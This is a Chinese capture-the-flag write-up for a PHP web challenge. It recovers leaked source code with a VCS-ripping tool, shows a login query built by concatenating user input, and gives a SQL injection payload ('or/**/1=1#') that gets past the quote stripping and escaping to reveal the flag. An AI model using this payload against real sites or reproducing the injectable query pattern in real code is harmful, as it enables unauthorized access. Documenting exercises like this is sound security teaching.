题目内容:http://117.50.3.97:1515/route.php?act=index
进入题目后,由于没有找到什么特别的信息,
因此这里对这个网页进行目录扫描和源码泄露扫描,
发现有源码泄露
源码恢复工具 -->>
https://github.com/kost/dvcs-ripper
在kali中用这个工具获得源码
部分关键代码:
if (isset($_SESSION['hat'])) {
if ($_SESSION['hat'] == 'green') {
output("<img src='green-hat-1.jpg'>", 10);
} else {
output("<img src='black-fedora.jpg'>", 1);
echo $flag; //输出flag session必须是非green
}
echo "<br><br><br><a href='logout.php'>I give up!</a>";
} else {
output("<img src='white-hat.jpg'>", 10);
echo "<br><br><br><a href='login.php'>I want to check the color of my hat!</a>";
}
找到设置session的位置
if (isset($_POST["name"])) {
$name = str_replace("'", "", trim(waf($_POST["name"]))); //waf后剥离两端空格 把'换为空
if (strlen($name) > 11) {
echo ("<script>alert('name too long')</script>");
} else {
$sql = "select count(*) from t_info where username = '$name' or nickname = '$name'";
echo $sql;
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row[0]) { //如果$_rows[0]存在
$_SESSION['hat'] = 'black'; //设置session
echo 'good job';
} else {
$_SESSION['hat'] = 'green';
}
header("Location: index.php");
}
}
if($_rows[0]) 的意思就是必须查出数据,即输入的name查询结果返回值不能为空。
我们只要利用 or 1=1就能让结果不为空了。
还有一点就是,在每一个进去的时候都会走route.php过、
route.php 是把post和get的数据addslashes了的,所有进入数据的会转义。
用/**/代替空格 然后通过or 1=1以及#注释掉后面的语句让整个语句恒真即可
最后构造Payload:or/**/1=1#'